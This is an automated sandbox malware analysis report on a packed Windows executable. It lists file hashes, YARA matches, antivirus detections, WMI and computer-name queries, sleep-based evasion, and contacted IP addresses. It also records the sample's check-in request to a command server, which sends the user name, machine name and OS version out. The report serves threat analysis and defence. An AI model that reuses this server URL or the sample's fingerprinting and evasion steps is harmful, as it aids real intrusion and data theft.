popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Application.exe

UPX Malicious Library OS Processor Check PE32 PE File
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6401 Dec. 11, 2023, 7:18 p.m. Dec. 11, 2023, 7:22 p.m.
Size 246.0KB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 dc9d29d62659c29eb6edd2295ad0c4ce
SHA256 fcd9e18762ea954d1170359c067f1bfa966998829b8dadde20f5ecb968a08ed9
CRC32 A5826A3B
ssdeep 6144:cdfmiZ2OlpN7LKWwgfwE2oKNUJgodswXE+AOT94e:cdf9h1LKWwgfwE3JJ
Yara
  • Malicious_Library_Zero - Malicious_Library
  • IsPE32 - (no description)
  • PE_Header_Zero - PE File Signature
  • UPX_Zero - UPX packed file
  • OS_Processor_Check_Zero - OS Processor Check

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
91.92.247.123 Active Moloch
91.92.247.161 Active Moloch
91.92.247.96 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0
suspicious_features Connection to IP address suspicious_request GET http://91.92.247.96/zhark/api.php?id=f79767bea410708a229488fa01b3db96&us=test22&mn=TEST22-PC&os=Windows%207%20Professional%20N&bld=1.0.3B
request GET http://91.92.247.96/zhark/api.php?id=f79767bea410708a229488fa01b3db96&us=test22&mn=TEST22-PC&os=Windows%207%20Professional%20N&bld=1.0.3B
description gfsvc.exe tried to sleep 230 seconds, actually delayed analysis time by 230 seconds
description Application.exe tried to sleep 660 seconds, actually delayed analysis time by 0 seconds
wmi SELECT * FROM Win32_Processor
wmi SELECT * FROM Win32_BaseBoard
wmi SELECT * FROM Win32_DiskDrive
wmi SELECT * FROM Win32_Processor
host 91.92.247.123
host 91.92.247.161
host 91.92.247.96
registry HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\SystemBiosVersion
file C:\Users\admin\Documents\Outlook Files\honey@pot.com.pst
Bkav W32.AIDetectMalware
MicroWorld-eScan Gen:Trojan.Heur.RP.puW@bS@FGQfi
Skyhigh BehavesLike.Win32.AdwareLinkury.dh
ALYac Gen:Trojan.Heur.RP.puW@bS@FGQfi
Cylance unsafe
VIPRE Gen:Trojan.Heur.RP.puW@bS@FGQfi
CrowdStrike win/malicious_confidence_90% (D)
Arcabit Trojan.Heur.RP.EBD67A
Symantec ML.Attribute.HighConfidence
Elastic malicious (high confidence)
APEX Malicious
BitDefender Gen:Trojan.Heur.RP.puW@bS@FGQfi
Emsisoft Gen:Trojan.Heur.RP.puW@bS@FGQfi (B)
F-Secure Heuristic.HEUR/AGEN.1319014
Trapmine suspicious.low.ml.score
FireEye Generic.mg.dc9d29d62659c29e
Sophos Generic ML PUA (PUA)
Avira HEUR/AGEN.1319014
Kingsoft malware.kb.a.899
GData Gen:Trojan.Heur.RP.puW@bS@FGQfi
Cynet Malicious (score: 100)
VBA32 BScope.Trojan.Wacatac
MAX malware (ai score=81)
Rising Trojan.Generic@AI.98 (RDML:KkcdlBva+xskWtDEn+wO/Q)
SentinelOne Static AI - Malicious PE
BitDefenderTheta AI:Packer.B03E043D1F
Cybereason malicious.c11d4e
DeepInstinct MALICIOUS
dead_host 91.92.247.123:80
dead_host 91.92.247.161:80